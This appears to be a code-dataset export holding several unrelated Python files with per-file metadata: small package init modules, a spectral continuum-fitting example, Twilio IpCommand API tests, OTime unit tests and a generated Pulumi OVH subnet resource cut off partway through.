| 0.84598
| 0.845206
| 0.844196
| 0.797091
| 0
| 0.008037
| 0.160154
| 131,711
| 2,962
| 106
| 44.466914
| 0.832946
| 0.007904
| 0
| 0.739726
| 0
| 0
| 0.042469
| 0.012431
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039574
| false
| 0
| 0.004566
| 0.000381
| 0.044901
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fc3b0ea50bbf83e496e3d60c4dc862f7a5144180
| 155
|
py
|
Python
|
mdp/orderbook/__init__.py
|
mehazardtfgm/sbedecoder
|
375e2d1f9557778170bdf3c3f0c36e721f013f52
|
[
"MIT"
] | 65
|
2016-01-31T18:38:37.000Z
|
2022-03-05T01:11:10.000Z
|
mdp/orderbook/__init__.py
|
mehazardtfgm/sbedecoder
|
375e2d1f9557778170bdf3c3f0c36e721f013f52
|
[
"MIT"
] | 22
|
2015-08-24T19:11:42.000Z
|
2020-05-07T18:01:19.000Z
|
mdp/orderbook/__init__.py
|
mehazardtfgm/sbedecoder
|
375e2d1f9557778170bdf3c3f0c36e721f013f52
|
[
"MIT"
] | 50
|
2015-08-20T14:57:59.000Z
|
2022-03-05T01:11:12.000Z
|
from .orderbook import OrderBookEntry
from .orderbook import OrderBook
from .packet_processor import PacketProcessor
from .orderbook import ConsolePrinter
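The four re-exports above let consumers import from the package root instead of the submodules (a sketch; constructor arguments are not shown because they are defined in the submodules, not here):

from mdp.orderbook import OrderBook, OrderBookEntry, PacketProcessor, ConsolePrinter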
| 31
| 45
| 0.870968
| 17
| 155
| 7.882353
| 0.470588
| 0.291045
| 0.425373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103226
| 155
| 4
| 46
| 38.75
| 0.964029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc52bf695a8e615af714422f1e894c9cbb16aa0c
| 303
|
py
|
Python
|
pines_analysis_toolkit/__init__.py
|
patricktamburo/pines_analysis_toolkit
|
d528d757cc1a7e0d8b7a599106814ff529b4ab77
|
[
"MIT"
] | 1
|
2020-06-05T21:18:09.000Z
|
2020-06-05T21:18:09.000Z
|
pines_analysis_toolkit/__init__.py
|
patricktamburo/pines_analysis_toolkit
|
d528d757cc1a7e0d8b7a599106814ff529b4ab77
|
[
"MIT"
] | 2
|
2021-01-27T16:57:23.000Z
|
2022-02-10T07:22:05.000Z
|
pines_analysis_toolkit/__init__.py
|
patricktamburo/pines_analysis_toolkit
|
d528d757cc1a7e0d8b7a599106814ff529b4ab77
|
[
"MIT"
] | null | null | null |
import pines_analysis_toolkit.data
import pines_analysis_toolkit.photometry
import pines_analysis_toolkit.analysis
import pines_analysis_toolkit.utils
import pines_analysis_toolkit.observing
import pines_analysis_toolkit.output
import pines_analysis_toolkit.pwv
import pines_analysis_toolkit.astrometry
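Because the package eagerly imports every subpackage, a single top-level import makes them all reachable as attributes (a sketch; the contents of each subpackage are defined elsewhere):

import pines_analysis_toolkit as pat

pat.photometry   # photometry routines
pat.astrometry   # astrometry routines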
| 33.666667
| 40
| 0.920792
| 40
| 303
| 6.575
| 0.275
| 0.334601
| 0.577947
| 0.790875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052805
| 303
| 8
| 41
| 37.875
| 0.916376
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fc643f7f9b349b21e21c884c9a40c6d98fc44535
| 142
|
py
|
Python
|
school_students_analysis/__init__.py
|
krzpiesiewicz/nypd2020z-school-students-analysis
|
5b7195b15e8a4e68093bf2750f52199692fa3146
|
[
"MIT"
] | null | null | null |
school_students_analysis/__init__.py
|
krzpiesiewicz/nypd2020z-school-students-analysis
|
5b7195b15e8a4e68093bf2750f52199692fa3146
|
[
"MIT"
] | null | null | null |
school_students_analysis/__init__.py
|
krzpiesiewicz/nypd2020z-school-students-analysis
|
5b7195b15e8a4e68093bf2750f52199692fa3146
|
[
"MIT"
] | null | null | null |
from .students_per_teacher import students_per_teacher_by_the_type_of_school
from .students_by_year_of_birth import students_by_year_of_birth
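The package root therefore re-exports the two analysis entry points; their call signatures live in the submodules, so this import sketch is all that can be grounded here:

from school_students_analysis import (
    students_per_teacher_by_the_type_of_school,
    students_by_year_of_birth,
)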
| 47.333333
| 76
| 0.929577
| 25
| 142
| 4.6
| 0.48
| 0.208696
| 0.313043
| 0.278261
| 0.365217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056338
| 142
| 2
| 77
| 71
| 0.858209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fc662d55bcf2a100a4845a8ae6108ae1826800ed
| 3,403
|
py
|
Python
|
examples/cont_example.py
|
AminFarhang/edibles
|
e148291d7f11932f228e58b2e2e6101bb82c3f24
|
[
"MIT"
] | 8
|
2020-04-15T10:44:48.000Z
|
2021-06-21T15:58:19.000Z
|
examples/cont_example.py
|
AminFarhang/edibles
|
e148291d7f11932f228e58b2e2e6101bb82c3f24
|
[
"MIT"
] | 100
|
2020-05-08T13:20:41.000Z
|
2022-01-11T20:04:52.000Z
|
examples/cont_example.py
|
jancami/edibles
|
51263b24c5e8aef786692011289b906a810ad2f7
|
[
"MIT"
] | 8
|
2020-05-27T00:39:39.000Z
|
2021-06-23T14:07:16.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from edibles.models import ContinuumModel
from edibles.utils.edibles_spectrum import EdiblesSpectrum
# #################################################################################
# Example 1
x = np.linspace(0, 3)
y = x**3 - 3 * x**2 + 1
cont_model = ContinuumModel(n_anchors=4)
cont_pars = cont_model.guess(y, x=x)
# ##############################
# Show initial model
out = cont_model.eval(data=y, params=cont_pars, x=x)
y_param_names = []
for i in range(cont_model.n_anchors):
y_param_names.append('y_' + str(i))
x_param_names = []
for i in range(cont_model.n_anchors):
x_param_names.append('x_' + str(i))
init_y = []
for par_name in y_param_names:
init_y.append(cont_pars[par_name].value)
init_x = []
for par_name in x_param_names:
init_x.append(cont_pars[par_name].value)
plt.scatter(x, y)
plt.plot(x, out, 'C1')
plt.scatter(init_x, init_y, marker='x', s=80, color='k')
plt.show()
# ##############################
# Fit
result = cont_model.fit(data=y, params=cont_pars, x=x)
out = cont_model.eval(data=y, params=result.params, x=x)
# print(result.fit_report())
# ##############################
# Show results
result_y_pars = []
for par_name in y_param_names:
result_y_pars.append(result.params[par_name].value)
result_x_pars = []
for par_name in x_param_names:
result_x_pars.append(result.params[par_name].value)
result.plot_fit()
plt.scatter(result_x_pars, result_y_pars, marker='x',
color='r', s=80, zorder=10, label='Fit params')
plt.scatter(init_x, init_y, marker='x', s=80, color='k', label='Initial params')
plt.legend()
plt.show()
# #################################################################################
# Example 2
# #################################################################################
sp = EdiblesSpectrum("/HD23466/BLUE_346/HD23466_w346_blue_20180731_O11.fits")
xmin = 3270
xmax = 3305
sp.getSpectrum(xmin=xmin, xmax=xmax)
cont_model = ContinuumModel(n_anchors=4)
cont_pars = cont_model.guess(sp.flux, x=sp.wave)
# ##############################
# Show initial model
out = cont_model.eval(data=sp.flux, params=cont_pars, x=sp.wave)
y_param_names = []
for i in range(cont_model.n_anchors):
y_param_names.append('y_' + str(i))
x_param_names = []
for i in range(cont_model.n_anchors):
x_param_names.append('x_' + str(i))
init_y = []
for par_name in y_param_names:
init_y.append(cont_pars[par_name].value)
init_x = []
for par_name in x_param_names:
init_x.append(cont_pars[par_name].value)
plt.scatter(sp.wave, sp.flux)
plt.plot(sp.wave, out, 'C1')
plt.scatter(init_x, init_y, marker='x', s=80, color='k')
plt.show()
# ##############################
# Fit
result = cont_model.fit(data=sp.flux, params=cont_pars, x=sp.wave)
out = cont_model.eval(data=sp.flux, params=result.params, x=sp.wave)
# print(result.fit_report())
# ##############################
# Show results
result_y_pars = []
for par_name in y_param_names:
result_y_pars.append(result.params[par_name].value)
result_x_pars = []
for par_name in x_param_names:
result_x_pars.append(result.params[par_name].value)
result.plot_fit()
plt.scatter(result_x_pars, result_y_pars, marker='x',
color='r', s=80, zorder=10, label='Fit params')
plt.scatter(init_x, init_y, marker='x', s=80, color='k', label='Initial params')
plt.legend()
plt.show()
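Both examples repeat the same anchor-collection loops. A possible helper, a sketch rather than part of the edibles API, that gathers anchor coordinates from an lmfit-style parameter set:

def anchor_points(pars, n_anchors, prefix):
    # Collect the values of <prefix>_0 .. <prefix>_{n-1} from the parameters.
    return [pars['{}_{}'.format(prefix, i)].value for i in range(n_anchors)]

# init_x = anchor_points(cont_pars, cont_model.n_anchors, 'x')
# init_y = anchor_points(cont_pars, cont_model.n_anchors, 'y')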
| 24.65942
| 83
| 0.625918
| 527
| 3,403
| 3.791271
| 0.151803
| 0.08008
| 0.044044
| 0.048048
| 0.821321
| 0.821321
| 0.821321
| 0.790791
| 0.740741
| 0.711712
| 0
| 0.020687
| 0.119306
| 3,403
| 137
| 84
| 24.839416
| 0.645979
| 0.04496
| 0
| 0.710526
| 0
| 0
| 0.044547
| 0.018888
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc73405e735a8be6b1b2bd6fa82148184a240924
| 7,162
|
py
|
Python
|
tests/integration/supersim/v1/test_ip_command.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1
|
2022-03-03T05:24:20.000Z
|
2022-03-03T05:24:20.000Z
|
tests/integration/supersim/v1/test_ip_command.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1
|
2022-01-28T14:45:53.000Z
|
2022-01-28T14:45:53.000Z
|
tests/integration/supersim/v1/test_ip_command.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class IpCommandTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.supersim.v1.ip_commands.create(sim="sim", payload="payload", device_port=1)
values = {'Sim': "sim", 'Payload': "payload", 'DevicePort': 1, }
self.holodeck.assert_has_request(Request(
'post',
'https://supersim.twilio.com/v1/IpCommands',
data=values,
))
def test_create_full_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "queued",
"direction": "to_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.supersim.v1.ip_commands.create(sim="sim", payload="payload", device_port=1)
self.assertIsNotNone(actual)
def test_create_minimal_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "queued",
"direction": "to_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.supersim.v1.ip_commands.create(sim="sim", payload="payload", device_port=1)
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.supersim.v1.ip_commands("HGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://supersim.twilio.com/v1/IpCommands/HGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "queued",
"direction": "to_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.supersim.v1.ip_commands("HGXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.supersim.v1.ip_commands.list()
self.holodeck.assert_has_request(Request(
'get',
'https://supersim.twilio.com/v1/IpCommands',
))
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"ip_commands": [],
"meta": {
"first_page_url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0",
"key": "ip_commands",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0"
}
}
'''
))
actual = self.client.supersim.v1.ip_commands.list()
self.assertIsNotNone(actual)
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0",
"key": "ip_commands",
"next_page_url": null,
"page": 0,
"page_size": 50,
"previous_page_url": null,
"url": "https://supersim.twilio.com/v1/IpCommands?Status=received&Sim=HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&PageSize=50&Page=0"
},
"ip_commands": [
{
"sid": "HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_sid": "HSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sim_iccid": "89883070000123456789",
"status": "received",
"direction": "from_sim",
"device_ip": "100.64.0.123",
"device_port": 100,
"payload_type": "text",
"payload": "checkin: firmware update",
"date_created": "2015-07-30T20:00:00Z",
"date_updated": "2015-07-30T20:00:00Z",
"url": "https://supersim.twilio.com/v1/IpCommands/HGaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
}
'''
))
actual = self.client.supersim.v1.ip_commands.list()
self.assertIsNotNone(actual)
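These tests run against the mocked holodeck transport; outside the test harness the same resource is reached through a real client (a sketch; ACCOUNT_SID and AUTH_TOKEN are placeholders for your own credentials):

from twilio.rest import Client

client = Client("ACCOUNT_SID", "AUTH_TOKEN")
ip_command = client.supersim.v1.ip_commands.create(
    sim="sim", payload="payload", device_port=1)
print(ip_command.sid)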
| 37.302083
| 156
| 0.534069
| 598
| 7,162
| 6.229097
| 0.170569
| 0.032215
| 0.056107
| 0.064966
| 0.884832
| 0.875436
| 0.856913
| 0.823356
| 0.822282
| 0.800268
| 0
| 0.065438
| 0.340687
| 7,162
| 191
| 157
| 37.497382
| 0.723422
| 0.015219
| 0
| 0.645161
| 1
| 0
| 0.112676
| 0.025885
| 0
| 0
| 0
| 0
| 0.177419
| 1
| 0.129032
| false
| 0
| 0.064516
| 0
| 0.209677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8a611ae49d9f9afb0888972cd48ac604d6550a
| 2,642
|
py
|
Python
|
python/test/o_types_test/test_otime.py
|
ojai/ojai-core
|
058b147e735fe95c83b339776daf79d437adae80
|
[
"Apache-2.0"
] | 51
|
2015-09-30T18:54:57.000Z
|
2020-08-13T09:35:15.000Z
|
python/test/o_types_test/test_otime.py
|
ojai/ojai-core
|
058b147e735fe95c83b339776daf79d437adae80
|
[
"Apache-2.0"
] | 21
|
2015-10-01T14:22:19.000Z
|
2022-02-04T02:17:26.000Z
|
python/test/o_types_test/test_otime.py
|
ojai/ojai-core
|
058b147e735fe95c83b339776daf79d437adae80
|
[
"Apache-2.0"
] | 25
|
2015-09-30T14:13:16.000Z
|
2021-12-10T21:29:32.000Z
|
from __future__ import unicode_literals
from ojai.types.OTime import OTime
try:
import unittest2 as unittest
except ImportError:
import unittest
class OTimeTest(unittest.TestCase):
def test_days_from_epoch(self):
epoch = 8587555
o_time = OTime(timestamp=epoch)
self.assertEqual(o_time.get_hour(), 12)
self.assertEqual(o_time.get_minute(), 25)
self.assertEqual(o_time.get_second(), 55)
self.assertEqual(o_time.get_millis(), 0)
parse_o_time = OTime.parse(time_str="12:25:55")
self.assertEqual(parse_o_time.get_hour(), o_time.get_hour())
self.assertEqual(parse_o_time.get_minute(), o_time.get_minute())
self.assertEqual(parse_o_time.get_second(), o_time.get_second())
        self.assertEqual(o_time, parse_o_time)
self.assertEqual(o_time.to_str("%H:%M:%S"), "12:25:55")
self.assertEqual(o_time.time_to_str(), "12:25:55")
def test_o_time_from_time(self):
o_time = OTime(hour_of_day=12, minutes=25, seconds=55)
self.assertEqual(o_time.get_hour(), 12)
self.assertEqual(o_time.get_minute(), 25)
self.assertEqual(o_time.get_second(), 55)
self.assertEqual(o_time.get_millis(), 0)
parse_o_time = OTime.parse(time_str="12:25:55")
self.assertEqual(parse_o_time.get_hour(), o_time.get_hour())
self.assertEqual(parse_o_time.get_minute(), o_time.get_minute())
self.assertEqual(parse_o_time.get_second(), o_time.get_second())
        self.assertEqual(o_time, parse_o_time)
self.assertEqual(o_time.to_str("%H:%M:%S"), "12:25:55")
self.assertEqual(o_time.time_to_str(), "12:25:55")
def test_o_time_from_date(self):
import datetime
o_time = OTime(date=datetime.datetime(year=1970, month=1, day=1, hour=12, minute=25, second=55))
self.assertEqual(o_time.get_hour(), 12)
self.assertEqual(o_time.get_minute(), 25)
self.assertEqual(o_time.get_second(), 55)
self.assertEqual(o_time.get_millis(), 0)
parse_o_time = OTime.parse(time_str="12:25:55")
self.assertEqual(parse_o_time.get_hour(), o_time.get_hour())
self.assertEqual(parse_o_time.get_minute(), o_time.get_minute())
self.assertEqual(parse_o_time.get_second(), o_time.get_second())
        self.assertEqual(o_time, parse_o_time)
self.assertEqual(o_time.to_str("%H:%M:%S"), "12:25:55")
self.assertEqual(o_time.time_to_str(), "12:25:55")
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(OTimeTest)
unittest.TextTestRunner(verbosity=2).run(suite)
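The three constructor forms exercised above are interchangeable for the same time of day; a condensed sketch based only on the calls in this test:

from ojai.types.OTime import OTime
import datetime

a = OTime(timestamp=8587555)                       # epoch timestamp
b = OTime(hour_of_day=12, minutes=25, seconds=55)  # explicit fields
c = OTime(date=datetime.datetime(1970, 1, 1, 12, 25, 55))
assert a == b == c == OTime.parse(time_str="12:25:55")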
| 43.311475
| 104
| 0.68433
| 399
| 2,642
| 4.172932
| 0.160401
| 0.15015
| 0.144144
| 0.216216
| 0.735135
| 0.735135
| 0.735135
| 0.731532
| 0.731532
| 0.731532
| 0
| 0.046768
| 0.174489
| 2,642
| 60
| 105
| 44.033333
| 0.716644
| 0
| 0
| 0.647059
| 0
| 0
| 0.039364
| 0
| 0
| 0
| 0
| 0
| 0.588235
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.196078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5da6d5adae1db6c3fbb3f449376d04d9c897aabc
| 28,126
|
py
|
Python
|
sdk/python/pulumi_ovh/pubic_cloud_private_network_subnet.py
|
tumblewader/pulumi-ovh
|
fd484de69a247cf4f05c22cf73f1c57b973a1dab
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_ovh/pubic_cloud_private_network_subnet.py
|
tumblewader/pulumi-ovh
|
fd484de69a247cf4f05c22cf73f1c57b973a1dab
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_ovh/pubic_cloud_private_network_subnet.py
|
tumblewader/pulumi-ovh
|
fd484de69a247cf4f05c22cf73f1c57b973a1dab
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PubicCloudPrivateNetworkSubnetArgs', 'PubicCloudPrivateNetworkSubnet']
@pulumi.input_type
class PubicCloudPrivateNetworkSubnetArgs:
def __init__(__self__, *,
end: pulumi.Input[str],
network: pulumi.Input[str],
network_id: pulumi.Input[str],
project_id: pulumi.Input[str],
region: pulumi.Input[str],
start: pulumi.Input[str],
dhcp: Optional[pulumi.Input[bool]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a PubicCloudPrivateNetworkSubnet resource.
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
pulumi.set(__self__, "end", end)
pulumi.set(__self__, "network", network)
pulumi.set(__self__, "network_id", network_id)
pulumi.set(__self__, "project_id", project_id)
pulumi.set(__self__, "region", region)
pulumi.set(__self__, "start", start)
if dhcp is not None:
pulumi.set(__self__, "dhcp", dhcp)
if no_gateway is not None:
pulumi.set(__self__, "no_gateway", no_gateway)
@property
@pulumi.getter
def end(self) -> pulumi.Input[str]:
"""
Last ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "end")
@end.setter
def end(self, value: pulumi.Input[str]):
pulumi.set(self, "end", value)
@property
@pulumi.getter
def network(self) -> pulumi.Input[str]:
"""
Global network in CIDR format.
Changing this value recreates the subnet
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: pulumi.Input[str]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Input[str]:
"""
The id of the network.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: pulumi.Input[str]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
"""
The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def start(self) -> pulumi.Input[str]:
"""
First ip for this region.
Changing this value recreates the subnet.
"""
return pulumi.get(self, "start")
@start.setter
def start(self, value: pulumi.Input[str]):
pulumi.set(self, "start", value)
@property
@pulumi.getter
def dhcp(self) -> Optional[pulumi.Input[bool]]:
"""
Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
"""
return pulumi.get(self, "dhcp")
@dhcp.setter
def dhcp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dhcp", value)
@property
@pulumi.getter(name="noGateway")
def no_gateway(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
"""
return pulumi.get(self, "no_gateway")
@no_gateway.setter
def no_gateway(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_gateway", value)
@pulumi.input_type
class _PubicCloudPrivateNetworkSubnetState:
def __init__(__self__, *,
cidr: Optional[pulumi.Input[str]] = None,
dhcp: Optional[pulumi.Input[bool]] = None,
end: Optional[pulumi.Input[str]] = None,
gateway_ip: Optional[pulumi.Input[str]] = None,
ip_pools: Optional[pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]]] = None,
network: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
no_gateway: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
start: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PubicCloudPrivateNetworkSubnet resources.
:param pulumi.Input[str] cidr: Ip Block representing the subnet cidr.
:param pulumi.Input[bool] dhcp: Enable DHCP.
Changing this forces a new resource to be created. Defaults to false.
:param pulumi.Input[str] end: Last ip for this region.
Changing this value recreates the subnet.
:param pulumi.Input[str] gateway_ip: The IP of the gateway
:param pulumi.Input[Sequence[pulumi.Input['PubicCloudPrivateNetworkSubnetIpPoolArgs']]] ip_pools: List of ip pools allocated in the subnet.
* `ip_pools/network` - Global network with cidr.
* `ip_pools/region` - Region where this subnet is created.
* `ip_pools/dhcp` - DHCP enabled.
* `ip_pools/end` - Last ip for this region.
* `ip_pools/start` - First ip for this region.
:param pulumi.Input[str] network: Global network in CIDR format.
Changing this value recreates the subnet
:param pulumi.Input[str] network_id: The id of the network.
Changing this forces a new resource to be created.
:param pulumi.Input[bool] no_gateway: Set to true if you don't want to set a default gateway IP.
Changing this value recreates the resource. Defaults to false.
:param pulumi.Input[str] project_id: The id of the public cloud project. If omitted,
the `OVH_PROJECT_ID` environment variable is used.
Changing this forces a new resource to be created.
:param pulumi.Input[str] region: The region in which the network subnet will be created.
Ex.: "GRA1". Changing this value recreates the resource.
:param pulumi.Input[str] start: First ip for this region.
Changing this value recreates the subnet.
"""
if cidr is not None:
pulumi.set(__self__, "cidr", cidr)
if dhcp is not None:
pulumi.set(__self__, "dhcp", dhcp)
if end is not None:
pulumi.set(__self__, "end", end)
if gateway_ip is not None:
